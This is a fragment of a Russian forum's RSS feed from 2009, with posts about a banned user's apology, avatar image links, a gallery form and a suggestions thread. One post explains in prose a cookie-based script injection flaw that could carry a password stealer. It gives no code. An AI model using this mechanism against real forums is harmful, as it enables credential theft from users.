						&lt;p&gt;Готов и дальше сотрудничать с администрацией. Прошу разбанить мой профиль. Искренне извиняюсь за все деструктивные действия когда либо совершенные на сервисе фастбб.&lt;/p&gt;
						&lt;p&gt;С уважением, Норм Иридиум.&lt;/p&gt;&lt;/blockquote&gt;&lt;/div&gt;&lt;p&gt;Суть уязвимости - вам в куки пишется скрипт когда вы заходите на чужой сайт/форум. По возвращению на свой форум этот скрипт вставляется из куков на форум и исполняется. Соответственно в скрипт может быть вложено что угодно в том числе и вор паролей.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Akahoshi)</author>
			<pubDate>Fri, 25 Sep 2009 00:32:33 +0400</pubDate>
			<guid>http://fun.rusff.me/viewtopic.php?pid=6553#p6553</guid>
		</item>
		<item>
			<title>Из моего</title>
			<link>http://fun.rusff.me/viewtopic.php?pid=6549#p6549</link>
			<description>&lt;p&gt;Хм, делаю в основном аватары, подписи и тому подобное, так что:&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://i078.radikal.ru/0909/44/5a56a72f9a7f.jpg&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://i078.radikal.ru/0909/44/5a56a72f9a7f.jpg&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://s58.radikal.ru/i160/0909/18/33de39555e64.jpg&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://s58.radikal.ru/i160/0909/18/33de39555e64.jpg&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://s19.radikal.ru/i192/0909/c5/c824cb9e4ff7.jpg&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://s19.radikal.ru/i192/0909/c5/c824cb9e4ff7.jpg&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://s59.radikal.ru/i166/0909/51/980623cd83b6.jpg&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://s59.radikal.ru/i166/0909/51/980623cd83b6.jpg&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://i029.radikal.ru/0909/8c/9f86dc9b8b67.gif&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://i029.radikal.ru/0909/8c/9f86dc9b8b67.gif&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://i038.radikal.ru/0909/ee/7dd69d4719f7.jpg&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://i038.radikal.ru/0909/ee/7dd69d4719f7.jpg&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://i005.radikal.ru/0909/14/2542f38b16a0.jpg&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://i005.radikal.ru/0909/14/2542f38b16a0.jpg&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://i027.radikal.ru/0909/c3/2376dc27f7d2.jpg&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://i027.radikal.ru/0909/c3/2376dc27f7d2.jpg&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Akahoshi)</author>
			<pubDate>Fri, 25 Sep 2009 00:19:40 +0400</pubDate>
			<guid>http://fun.rusff.me/viewtopic.php?pid=6549#p6549</guid>
		</item>
		<item>
			<title>Галерея</title>
			<link>http://fun.rusff.me/viewtopic.php?pid=6540#p6540</link>
			<description>&lt;p&gt;&lt;span style=&quot;font-family: Comic Sans Ms&quot;&gt;&lt;span style=&quot;color: blue&quot;&gt;&lt;strong&gt;&lt;span style=&quot;font-size: 16px&quot;&gt;Заполните бланк для вывода картинки в галерею.&lt;/span&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;quote-box quote-main&quot;&gt;&lt;blockquote&gt;&lt;p&gt;1. Раздел галереи&lt;br /&gt;2. Описание картинки&lt;br /&gt;3. сама картинка.&lt;/p&gt;&lt;/blockquote&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Все поля обязательны!!&lt;/strong&gt;&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://xdfor.ru/pages/galereya&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Галерея&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Андрюха)</author>
			<pubDate>Wed, 23 Sep 2009 14:02:12 +0400</pubDate>
			<guid>http://fun.rusff.me/viewtopic.php?pid=6540#p6540</guid>
		</item>
		<item>
			<title>Вопросы и предложения</title>
			<link>http://fun.rusff.me/viewtopic.php?pid=6347#p6347</link>
			<description>&lt;p&gt;Если возникли вопросы по форуму, по его работе или же хотите что бы появился новый раздел или внесли какую-либо поправку, пишите сюда&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Андрюха)</author>
			<pubDate>Sun, 30 Aug 2009 00:37:11 +0400</pubDate>
			<guid>http://fun.rusff.me/viewtopic.php?pid=6347#p6347</guid>
		</item>
	</channel>
</rss>
